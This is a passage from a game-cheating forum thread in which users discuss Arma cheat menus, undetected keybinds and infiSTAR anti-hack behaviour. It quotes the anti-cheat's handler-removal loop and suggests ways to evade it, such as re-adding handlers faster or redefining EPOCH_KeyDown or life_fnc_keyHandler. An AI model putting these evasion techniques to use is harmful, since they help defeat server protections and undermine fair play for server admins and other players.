    Edit: Also, to add more fuel to the fire, like i wrote further up, this guy who "wrote this" was selling Lystics menu with his own name on it also

    Are you coding a3 now furiouswai?
    Last edited by Jme; 11-19-2014 at 09:01 AM.

  12. #12
    furiouswai's Avatar
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    Quote Originally Posted by Jme View Post
    Funnily enough, i already posted a scroll menu template that noobs like this can use so they don't get errors trying to remove an action that doesn't exist.

    I also released an undetected keybind, but tards will be tards *sigh*

    Edit: Also, to add more fuel to the fire, like i wrote further up, this guy who "wrote this" was selling Lystics menu with his own name on it also

    Are you coding a3 now furiouswai?
    Yeah, I just use if (!isNil 'actionName') then { //removeAction ... }; to prevent errors when the action doesn't exist.

    What is the keybind method you released? I see your 911 menu just adds it to display 46 normally. Infistar runs this on loop every .1s:
    _display46 = (findDisplay 46);
    if (!isNull _display46) then
    	_display46 displayRemoveAllEventHandlers 'MouseButtonDown';
    	_display46 displayRemoveAllEventHandlers 'MouseButtonUp';
    	_display46 displayRemoveAllEventHandlers 'MouseZChanged';
    	_display46 displayRemoveAllEventHandlers 'KeyPress';
    	_display46 displayRemoveAllEventHandlers 'KeyDown';
    	_display46 displayRemoveAllEventHandlers 'KeyUp';
    	_display46 displayRemoveAllEventHandlers 'onMouseZChanged';
    	_display46 displayRemoveAllEventHandlers 'mousemoving';
    	_display46 displayRemoveAllEventHandlers 'mouseholding';
    	if (isNil 'life_fnc_keyHandler') then {life_fnc_keyHandler = {};} else {if (typeName life_fnc_keyHandler != 'CODE') then {life_fnc_keyHandler = {};};_display46 displayAddEventHandler ['KeyDown','_this call life_fnc_keyHandler;'];};
    	if (isNil 'EPOCH_KeyDown') then {EPOCH_KeyDown = {};} else {if (typeName EPOCH_KeyDown != 'CODE') then {EPOCH_KeyDown = {};};_display46 displayAddEventHandler ['KeyDown','_this call EPOCH_KeyDown;'];};
    I suppose you could keep readding it on loop faster than .1s. Or you could redefine EPOCH_KeyDown or life_fnc_keyHandler functions to include your keybinds. I assume most smart admins compileFinal those functions if they are not already by default.

    I do not see much point in posting cheat scripts on here. It is like saying to admins and devs "Here are some cheats I made, please try to patch them." Maybe once in a while for fun though.

  13. #13
    Jme's Avatar
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    Quote Originally Posted by furiouswai View Post
    What is the keybind method you released?
    Its a bowen classic he was using in standalone, i only "released" it because it got archived on mpgh. Its at the bottom of this post, i use it in almost every mod without any issues.

    Edit: Also, 911 is an edit of 313, which is an edit of v5. It only has my name all over it because the guy who helped add scripts to 911 was selling it with his name on it lol
    Last edited by Jme; 11-19-2014 at 07:36 PM.

  14. #14
    furiouswai's Avatar
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    Quote Originally Posted by Jme View Post
    Its a bowen classic he was using in standalone, i only "released" it because it got archived on mpgh. Its at the bottom of this post, i use it in almost every mod without any issues.

    Edit: Also, 911 is an edit of 313, which is an edit of v5. It only has my name all over it because the guy who helped add scripts to 911 was selling it with his name on it lol
    Ah, yes. I forgot inputAction still works nicely on A3. On A2 infi added it to his BHF list shortly after bowen posted about it though.

  15. #15
    Jme's Avatar
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    Quote Originally Posted by furiouswai View Post
    On A2 infi added it to his BHF list shortly after bowen posted about it though.
    I guess that's why infi's AH gets leaked every other week! i remember using your undetected scroll for dayz epoch, worked nicely as did the frequent updates! would be nice to have you on A3

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